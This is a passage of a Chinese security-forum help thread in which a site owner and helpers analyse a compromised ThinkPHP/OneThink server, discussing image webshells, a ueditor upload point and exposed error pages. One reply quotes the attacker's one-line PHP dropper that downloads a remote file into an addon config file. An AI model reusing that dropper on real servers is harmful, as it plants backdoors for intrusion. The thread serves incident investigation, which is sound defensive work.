[求助]服务器被入侵有日志这些能找出漏洞吗-付费问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (51) ◀ 1 2 3 ▶
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 26 楼 wx_三五瓶他上传都是直接上传的图片马，但是他怎么运行的可能是利用了一些其他漏洞把图片后缀改成php了 2020-8-23 20:37 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 27 楼现在应该没有解析漏洞吧 2020-8-23 20:40 0
wmsuper 雪币： 10274 活跃值： (15210) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 343 关注私信	wmsuper 7 28 楼 wx_三五瓶他上传都是直接上传的图片马，但是他怎么运行的从日志看黑客似乎没有访问过这个wenshell，只是说上传上去了。 2020-8-23 20:41 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 29 楼能看出在哪上传的吗 2020-8-23 20:42 0
wmsuper 雪币： 10274 活跃值： (15210) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 343 关注私信	wmsuper 7 30 楼 wx_三五瓶能看出在哪上传的吗从结果看时候是从通过ueditor编辑器插件上传的，日志没有相关请求，不知道是被删了还是啥的。 2020-8-23 20:44 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 31 楼 wx_三五瓶他上传都是直接上传的图片马，但是他怎么运行的而且你那个网站好像还有点问题随便访问一个不存在的页面就会[0] HttpException in App.php line 535 模块不存在:12333 本来应该弹404页面的 2020-8-23 20:45 0
wmsuper 雪币： 10274 活跃值： (15210) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 343 关注私信	wmsuper 7 32 楼 EX呵呵而且你那个网站好像还有点问题随便访问一个不存在的页面就会[0] HttpException in App.php line 535 模块不存在:12333 本来应该弹404页面的对，ThinkPHP错误日志没禁用，哈哈。 2020-8-23 20:46 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 33 楼 wmsuper 从结果看时候是从通过ueditor编辑器插件上传的，日志没有相关请求，不知道是被删了还是啥的。感觉改php后缀应该也是通过编辑器插件搞的吧 2020-8-23 20:46 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 34 楼我知道有问题，只是很想知道上传点在哪，我重做在多次系统都没有用，源码有上传点 2020-8-23 20:47 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 35 楼 wmsuper 对，ThinkPHP错误日志没禁用，哈哈。我刚刚查了一下说可以禁用呀 2020-8-23 20:47 0
wmsuper 雪币： 10274 活跃值： (15210) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 343 关注私信	wmsuper 7 36 楼 wmsuper 从结果看时候是从通过ueditor编辑器插件上传的，日志没有相关请求，不知道是被删了还是啥的。先更新插件，不行再说吧 2020-8-23 20:47 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 37 楼 wx_三五瓶我知道有问题，只是很想知道上传点在哪，我重做在多次系统都没有用，源码有上传点看看编辑器插件 2020-8-23 20:48 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 38 楼 wmsuper 先更新插件，不行再说吧不知道上传点在哪呗那他的shell到底怎么连接啊，有方法么 2020-8-23 20:49 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 39 楼 8a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0q4Q4x3X3g2K6M7%4u0J5L8g2)9J5k6h3y4F1i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3M7%4c8S2N6r3W2U0i4K6u0r3N6h3g2V1K9i4c8G2M7R3`.`. 2020-8-23 20:50 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 40 楼 EX呵呵 1b9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0q4Q4x3X3g2K6M7%4u0J5L8g2)9J5k6h3y4F1i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3M7%4c8S2N6r3W2U0i4K6u0r3N6h3g2V1K9i4c8G2M7R3`.`. 这里访问是直接报错的啊 2020-8-23 20:51 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 41 楼检查一下/www/wwwroot/1.ssrrm.cn/public/static/ueditor 2020-8-23 20:57 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 42 楼估计那个人是从某个要引用uplode文件夹里的内容的php里访问的 2020-8-23 20:58 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 43 楼 EX呵呵估计那个人是从某个要引用uplode文件夹里的内容的php里访问的 <?php // +---------------------------------------------------------------------- // \| OneThink [ WE CAN DO IT JUST THINK IT ] // +---------------------------------------------------------------------- // \| Copyright (c) 2013 505K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8Z5K9h3&6C8M7r3S2H3i4K6u0W2j5$3&6Q4x3V1k6Q4x3U0k6F1j5Y4y4H3i4K6y4n7b7h3I4D9i4K6t1$3L8X3u0K6M7q4)9K6b7Y4u0A6k6$3S2@1M7#2)9J5y4X3&6T1M7%4m8Q4x3@1u0J5k6i4y4W2M7Y4k6W2k6q4)9J5k6b7`.`. // +---------------------------------------------------------------------- // \| Author: 天狗 <201912782@qq.com> <4fcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4A6B7P5X3W2@1i4K6u0W2j5$3&6Q4x3U0k6Y4N6q4)9K6b7R3`.`. // +---------------------------------------------------------------------- namespace Addons\Attachment; use Common\Controller\Addon; /** * 附件插件 * @author 天狗 <201912782@qq.com> / class AttachmentAddon extends Addon{ public $info = array( 'name' => 'Attachment', 'title' => '附件', 'description' => '用于文档模型上传附件', 'status' => 1, 'author' => 'thinkphp', 'version' => '0.1' ); public $admin_list = array( 'list_grid' => array( 'id:ID', 'title:文件名', 'size:大小', 'update_time_text:更新时间', 'document_title:文档标题' ), 'model'=>'Attachment', 'order'=>'id asc' ); public $custom_adminlist = 'adminlist.html'; public function install(){ return true; } public function uninstall(){ return true; } / 显示文档模型编辑页插件扩展信息表单 / public function documentEditForm($param = array()){ $this->assign($param); $this->display(T('Addons://Attachment@Article/edit')); } / 文档末尾显示附件列表 / public function documentDetailAfter($info = array()){ if(empty($info) \|\| empty($info['id'])){ //数据不正确 return ; } / 获取当前文档附件 / $Attachment = D('Addons://Attachment/Attachment'); $map = array('record_id' => $info['id'], 'status' => 1); $list = $Attachment->field(true)->where($map)->select(); if(!$list){ //不存在附件 return ; } / 模板赋值并渲染模板 / $this->assign('list', $list); $this->display(T('Addons://Attachment@Article/detail')); } /* * 文档保存成功后执行行为 * @param array $data 文档数据 * @param array $catecory 分类数据 / public function documentSaveComplete($param){ if (MODULE_NAME == 'Home') { list($data, $category) = $param; / 附件默认配置项 / $default = C('ATTACHMENT_DEFAULT'); / 合并当前配置 / $config = $category['extend']['attachment']; $config = empty($config) ? $default : array_merge($default, $config); $attach = I('post.attachment'); / 该分类不允许上传附件 */ if(!$config['is_upload'] \|\| !in_array($attach['type'], str2arr($config['allow_type']))){ return ; } switch ($attach['type']) { case 1: //外链 # code... break; case 2: //文件 $info = json_decode(think_decrypt($attach['info']), true); if(!empty($info)){ $Attachment = D('Addons://Attachment/Attachment'); $Attachment->saveFile($info['name'], $info, $data['id']); } else { return; //TODO:非法附件上传，可记录日志 } break; } } } } 2020-8-23 21:00 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 44 楼 EX呵呵估计那个人是从某个要引用uplode文件夹里的内容的php里访问的 <table> <thead> <tr> <volist name="list_grid" id="vo"> <th>{$vo.title}</th> </volist> <!-- <th>操作</th> --> </tr> </thead> <tbody> <volist name="_list" id="lv" key="vo"> <tr> <td>{$lv.id}</td> <volist name="list_grid" id="lk"> <td>{$lv.$lk}</td> </volist> <td> <!-- <a class="update" href="javascript:;" data-id="{$lv.id}">更新</a> --> </td> </tr> </volist> </tbody> </table> <script type="text/javascript"> $(function(){ $('a.update').click(function(){ id = $(this).data('id'); alert(id); }); }) </script> AttachmentAddon.class.php adminlist.html 就这两个文件 2020-8-23 21:02 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 45 楼他的马是这么写的：<?php file_put_contents('./Addons/Attachment/config.php',file_get_contents('ffdK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2Z5k6%4W2J5N6q4)9J5k6i4y4H3j5h3y4W2i4K6u0r3M7r3W2U0i4K6u0W2N6s2S2@1i4K6t1%4i4K6t1&6i4K6t1&6i4K6y4n7N6h3&6D9K9h3&6C8i4K6t1^5i4K6t1%4N6r3g2K6N6o6q4Q4x3X3g2H3K9s2m8Q4x3U0N6Q4x3U0W2Q4x3@1k6Q4x3U0k6Y4N6q4)9K6b7R3`.`. 2020-8-23 21:03 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 46 楼远程下载 2020-8-23 21:03 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 47 楼 pic.txt才是真马 2020-8-23 21:03 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 48 楼 ba9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0q4Q4x3X3f1I4y4o6u0G2P5X3N6^5i4K6u0W2j5$3&6Q4x3V1k6b7N6h3u0D9K9h3y4Q4x3V1k6K6N6r3q4@1K9h3y4Q4x3V1k6#2k6h3c8A6N6r3!0J5i4K6u0r3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4c8e0k6Q4z5o6W2Q4z5e0y4Q4c8e0g2Q4b7V1y4Q4z5o6m8Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0c8Q4b7U0S2Q4z5o6m8Q4c8e0c8Q4b7U0S2Q4b7f1q4Q4c8e0N6Q4b7V1y4Q4z5e0k6Q4c8e0S2Q4b7V1g2Q4z5e0q4Q4c8e0g2Q4z5e0W2Q4b7e0S2Q4c8e0W2Q4b7e0q4Q4b7U0g2Q4c8e0W2Q4z5f1c8Q4b7e0u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0c8Q4b7V1u0Q4z5e0k6Q4c8e0g2Q4z5o6S2Q4b7e0W2Q4c8e0N6Q4z5e0c8Q4b7e0S2Q4c8e0S2Q4b7V1k6Q4z5e0W2Q4c8e0W2Q4z5o6N6Q4z5p5y4Q4c8e0g2Q4b7U0W2Q4b7U0u0Q4c8e0g2Q4z5e0g2Q4b7e0g2Q4c8f1k6Q4b7V1y4Q4z5f1k6Q4c8f1k6Q4b7V1y4Q4z5f1j5`. 2020-8-23 21:05 0
EX呵呵雪币： 410 活跃值： (5238) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 234 粉丝 6 关注私信	EX呵呵 49 楼 wx_三五瓶 <table> <thead> <tr> <volist name ... 那个人的马在./Addons/Attachment/config.php 2020-8-23 21:06 0
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 50 楼 EX呵呵 pic.txt才是真马 73dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0q4Q4x3X3f1I4y4o6u0G2P5X3N6^5i4K6u0W2j5$3&6Q4x3V1k6b7N6h3u0D9K9h3y4Q4x3V1k6K6N6r3q4@1K9h3y4Q4x3V1k6#2k6h3c8A6N6r3!0J5i4K6u0r3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1@1i4@1t1^5i4@1q4m8i4@1f1%4i4@1u0o6i4K6V1$3i4@1f1^5i4@1u0q4i4K6V1I4i4@1f1#2i4K6V1&6i4@1p5^5i4@1f1#2i4K6V1J5i4K6S2o6i4@1f1#2i4@1p5#2i4@1t1&6i4@1f1@1i4@1t1^5i4K6S2m8i4@1f1@1i4@1u0o6i4@1p5H3i4@1f1#2i4K6W2n7i4@1u0q4i4@1f1%4i4K6R3&6i4K6R3%4i4@1f1&6i4@1p5&6i4@1q4o6i4@1f1$3i4K6W2o6i4K6R3&6i4@1f1@1i4@1u0n7i4K6R3H3i4@1f1@1i4@1t1&6i4K6R3^5i4@1f1#2i4K6R3#2i4@1t1K6i4@1f1%4i4@1t1K6i4@1u0n7i4@1f1#2i4K6V1H3i4K6V1%4i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1@1i4@1t1^5i4@1u0n7i4@1f1^5i4@1p5$3i4K6R3I4i4@1f1$3i4K6V1^5i4@1q4r3i4@1f1#2i4K6W2n7i4@1u0q4i4@1f1%4i4K6R3&6i4K6R3%4i4@1f1&6i4@1p5&6i4@1q4o6i4@1f1$3i4K6R3H3i4K6S2q4i4@1f1@1i4@1t1&6i4K6R3^5i4@1f1^5i4@1p5%4i4@1p5K6i4@1f1$3i4K6W2q4i4K6V1H3i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1#2i4K6V1#2i4K6S2m8 2020-8-23 21:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 26 楼

wx_三五瓶他上传都是直接上传的图片马，但是他怎么运行的

可能是利用了一些其他漏洞把图片后缀改成php了

2020-8-23 20:37

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 27 楼

现在应该没有解析漏洞吧

2020-8-23 20:40

0

wmsuper

雪币： 10274

活跃值： (15210)

能力值：

( LV13，RANK：400 )

在线值：

发帖

36

回帖

136

粉丝

343

关注

私信

wmsuper 7: 28 楼

wx_三五瓶他上传都是直接上传的图片马，但是他怎么运行的

从日志看黑客似乎没有访问过这个wenshell，只是说上传上去了。

2020-8-23 20:41

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 29 楼

能看出在哪上传的吗

2020-8-23 20:42

0

wmsuper

雪币： 10274

活跃值： (15210)

能力值：

( LV13，RANK：400 )

在线值：

发帖

36

回帖

136

粉丝

343

关注

私信

wmsuper 7: 30 楼

wx_三五瓶能看出在哪上传的吗

从结果看时候是从通过ueditor编辑器插件上传的，日志没有相关请求，不知道是被删了还是啥的。

2020-8-23 20:44

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 31 楼

wx_三五瓶他上传都是直接上传的图片马，但是他怎么运行的

而且你那个网站好像还有点问题随便访问一个不存在的页面就会[0] HttpException in App.php line 535
模块不存在:12333 本来应该弹404页面的

2020-8-23 20:45

0

wmsuper

雪币： 10274

活跃值： (15210)

能力值：

( LV13，RANK：400 )

在线值：

发帖

36

回帖

136

粉丝

343

关注

私信

wmsuper 7: 32 楼

EX呵呵而且你那个网站好像还有点问题随便访问一个不存在的页面就会[0] HttpException in App.php line 535 模块不存在:12333 本来应该弹404页面的

对，ThinkPHP错误日志没禁用，哈哈。

2020-8-23 20:46

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 33 楼

wmsuper 从结果看时候是从通过ueditor编辑器插件上传的，日志没有相关请求，不知道是被删了还是啥的。

感觉改php后缀应该也是通过编辑器插件搞的吧

2020-8-23 20:46

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 34 楼

我知道有问题，只是很想知道上传点在哪，我重做在多次系统都没有用，源码有上传点

2020-8-23 20:47

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 35 楼

wmsuper 对，ThinkPHP错误日志没禁用，哈哈。

我刚刚查了一下说可以禁用呀

2020-8-23 20:47

0

wmsuper

雪币： 10274

活跃值： (15210)

能力值：

( LV13，RANK：400 )

在线值：

发帖

36

回帖

136

粉丝

343

关注

私信

wmsuper 7: 36 楼

wmsuper 从结果看时候是从通过ueditor编辑器插件上传的，日志没有相关请求，不知道是被删了还是啥的。

先更新插件，不行再说吧

2020-8-23 20:47

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 37 楼

wx_三五瓶我知道有问题，只是很想知道上传点在哪，我重做在多次系统都没有用，源码有上传点

看看编辑器插件

2020-8-23 20:48

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 38 楼

wmsuper 先更新插件，不行再说吧

不知道上传点在哪呗

那他的shell到底怎么连接啊，有方法么

2020-8-23 20:49

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 39 楼

8a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0q4Q4x3X3g2K6M7%4u0J5L8g2)9J5k6h3y4F1i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3M7%4c8S2N6r3W2U0i4K6u0r3N6h3g2V1K9i4c8G2M7R3`.`.

2020-8-23 20:50

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 40 楼

EX呵呵 1b9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0q4Q4x3X3g2K6M7%4u0J5L8g2)9J5k6h3y4F1i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3M7%4c8S2N6r3W2U0i4K6u0r3N6h3g2V1K9i4c8G2M7R3`.`.

这里访问是直接报错的啊

2020-8-23 20:51

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 41 楼

检查一下/www/wwwroot/1.ssrrm.cn/public/static/ueditor

2020-8-23 20:57

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 42 楼

估计那个人是从某个要引用uplode文件夹里的内容的php里访问的

2020-8-23 20:58

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 43 楼

EX呵呵估计那个人是从某个要引用uplode文件夹里的内容的php里访问的

<?php
// +----------------------------------------------------------------------
// | OneThink [ WE CAN DO IT JUST THINK IT ]
// +----------------------------------------------------------------------
// | Copyright (c) 2013 505K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8Z5K9h3&6C8M7r3S2H3i4K6u0W2j5$3&6Q4x3V1k6Q4x3U0k6F1j5Y4y4H3i4K6y4n7b7h3I4D9i4K6t1$3L8X3u0K6M7q4)9K6b7Y4u0A6k6$3S2@1M7#2)9J5y4X3&6T1M7%4m8Q4x3@1u0J5k6i4y4W2M7Y4k6W2k6q4)9J5k6b7`.`.
// +----------------------------------------------------------------------
// | Author: 天狗 <201912782@qq.com> <4fcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4A6B7P5X3W2@1i4K6u0W2j5$3&6Q4x3U0k6Y4N6q4)9K6b7R3`.`.
// +----------------------------------------------------------------------

namespace Addons\Attachment;
use Common\Controller\Addon;

/**
 * 附件插件
 * @author 天狗 <201912782@qq.com>
 */
class AttachmentAddon extends Addon{

	public $info = array(
		'name'        => 'Attachment',
		'title'       => '附件',
		'description' => '用于文档模型上传附件',
		'status'      => 1,
		'author'      => 'thinkphp',
		'version'     => '0.1'
	);

	public $admin_list = array(
		'list_grid' => array(
			'id:ID',
			'title:文件名',
			'size:大小',
			'update_time_text:更新时间',
			'document_title:文档标题'
		),
		'model'=>'Attachment',
		'order'=>'id asc'
	);

	public $custom_adminlist = 'adminlist.html';

	public function install(){
		return true;
	}

	public function uninstall(){
		return true;
	}

	/* 显示文档模型编辑页插件扩展信息表单 */
	public function documentEditForm($param = array()){
		$this->assign($param);
		$this->display(T('Addons://Attachment@Article/edit'));
	}

	/* 文档末尾显示附件列表 */
	public function documentDetailAfter($info = array()){
		if(empty($info) || empty($info['id'])){ //数据不正确
			return ;
		}

		/* 获取当前文档附件 */
		$Attachment = D('Addons://Attachment/Attachment');
		$map = array('record_id' => $info['id'], 'status' => 1);
		$list = $Attachment->field(true)->where($map)->select();
		if(!$list){ //不存在附件
			return ;
		}

		/* 模板赋值并渲染模板 */
		$this->assign('list', $list);
		$this->display(T('Addons://Attachment@Article/detail'));
	}

	/**
	 * 文档保存成功后执行行为
	 * @param  array  $data     文档数据
	 * @param  array  $catecory 分类数据
	 */
	public function documentSaveComplete($param){
		if (MODULE_NAME == 'Home') {
			list($data, $category) = $param;
			/* 附件默认配置项 */
			$default  = C('ATTACHMENT_DEFAULT');

			/* 合并当前配置 */
			$config = $category['extend']['attachment'];
			$config = empty($config) ? $default : array_merge($default, $config);
			$attach = I('post.attachment');

			/* 该分类不允许上传附件 */
			if(!$config['is_upload'] || !in_array($attach['type'], str2arr($config['allow_type']))){
				return ;
			}

			switch ($attach['type']) {
				case 1: //外链
					# code...
					break;
				case 2: //文件
					$info = json_decode(think_decrypt($attach['info']), true);
					if(!empty($info)){
						$Attachment = D('Addons://Attachment/Attachment');
						$Attachment->saveFile($info['name'], $info, $data['id']);
					} else {
						return; //TODO:非法附件上传，可记录日志
					}
					break;
			}
		}
	}
}

2020-8-23 21:00

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 44 楼

EX呵呵估计那个人是从某个要引用uplode文件夹里的内容的php里访问的

<table>
	<thead>
		<tr>
			<volist name="list_grid" id="vo">
				<th>{$vo.title}</th>
			</volist>
			<!-- <th>操作</th> -->
		</tr>
	</thead>
	<tbody>
		<volist name="_list" id="lv" key="vo">
		<tr>
			<td>{$lv.id}</td>
			<volist name="list_grid" id="lk">
				<td>{$lv.$lk}</td>
			</volist>
			<td>
				<!-- <a class="update" href="javascript:;" data-id="{$lv.id}">更新</a> -->
			</td>
		</tr>
		</volist>
	</tbody>
</table>
<script type="text/javascript">
	$(function(){
		$('a.update').click(function(){
			id = $(this).data('id');
			alert(id);
		});
	})
</script>

AttachmentAddon.class.php adminlist.html 就这两个文件

2020-8-23 21:02

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 45 楼

他的马是这么写的：<?php file_put_contents('./Addons/Attachment/config.php',file_get_contents('ffdK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2Z5k6%4W2J5N6q4)9J5k6i4y4H3j5h3y4W2i4K6u0r3M7r3W2U0i4K6u0W2N6s2S2@1i4K6t1%4i4K6t1&6i4K6t1&6i4K6y4n7N6h3&6D9K9h3&6C8i4K6t1^5i4K6t1%4N6r3g2K6N6o6q4Q4x3X3g2H3K9s2m8Q4x3U0N6Q4x3U0W2Q4x3@1k6Q4x3U0k6Y4N6q4)9K6b7R3`.`.

2020-8-23 21:03

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 46 楼

远程下载

2020-8-23 21:03

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 47 楼

pic.txt才是真马

2020-8-23 21:03

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 48 楼

ba9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0q4Q4x3X3f1I4y4o6u0G2P5X3N6^5i4K6u0W2j5$3&6Q4x3V1k6b7N6h3u0D9K9h3y4Q4x3V1k6K6N6r3q4@1K9h3y4Q4x3V1k6#2k6h3c8A6N6r3!0J5i4K6u0r3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4c8e0k6Q4z5o6W2Q4z5e0y4Q4c8e0g2Q4b7V1y4Q4z5o6m8Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0c8Q4b7U0S2Q4z5o6m8Q4c8e0c8Q4b7U0S2Q4b7f1q4Q4c8e0N6Q4b7V1y4Q4z5e0k6Q4c8e0S2Q4b7V1g2Q4z5e0q4Q4c8e0g2Q4z5e0W2Q4b7e0S2Q4c8e0W2Q4b7e0q4Q4b7U0g2Q4c8e0W2Q4z5f1c8Q4b7e0u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0c8Q4b7V1u0Q4z5e0k6Q4c8e0g2Q4z5o6S2Q4b7e0W2Q4c8e0N6Q4z5e0c8Q4b7e0S2Q4c8e0S2Q4b7V1k6Q4z5e0W2Q4c8e0W2Q4z5o6N6Q4z5p5y4Q4c8e0g2Q4b7U0W2Q4b7U0u0Q4c8e0g2Q4z5e0g2Q4b7e0g2Q4c8f1k6Q4b7V1y4Q4z5f1k6Q4c8f1k6Q4b7V1y4Q4z5f1j5`.

2020-8-23 21:05

0

EX呵呵

雪币： 410

活跃值： (5238)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

234

粉丝

6

关注

私信

EX呵呵: 49 楼

wx_三五瓶 <table> <thead> <tr> <volist name ...

那个人的马在./Addons/Attachment/config.php

2020-8-23 21:06

0

wx_三五瓶

雪币： 10

活跃值： (557)

能力值：

( LV2，RANK：10 )

在线值：

发帖

13

回帖

61

粉丝

1

关注

私信

wx_三五瓶: 50 楼

EX呵呵 pic.txt才是真马

73dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0q4Q4x3X3f1I4y4o6u0G2P5X3N6^5i4K6u0W2j5$3&6Q4x3V1k6b7N6h3u0D9K9h3y4Q4x3V1k6K6N6r3q4@1K9h3y4Q4x3V1k6#2k6h3c8A6N6r3!0J5i4K6u0r3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1@1i4@1t1^5i4@1q4m8i4@1f1%4i4@1u0o6i4K6V1$3i4@1f1^5i4@1u0q4i4K6V1I4i4@1f1#2i4K6V1&6i4@1p5^5i4@1f1#2i4K6V1J5i4K6S2o6i4@1f1#2i4@1p5#2i4@1t1&6i4@1f1@1i4@1t1^5i4K6S2m8i4@1f1@1i4@1u0o6i4@1p5H3i4@1f1#2i4K6W2n7i4@1u0q4i4@1f1%4i4K6R3&6i4K6R3%4i4@1f1&6i4@1p5&6i4@1q4o6i4@1f1$3i4K6W2o6i4K6R3&6i4@1f1@1i4@1u0n7i4K6R3H3i4@1f1@1i4@1t1&6i4K6R3^5i4@1f1#2i4K6R3#2i4@1t1K6i4@1f1%4i4@1t1K6i4@1u0n7i4@1f1#2i4K6V1H3i4K6V1%4i4@1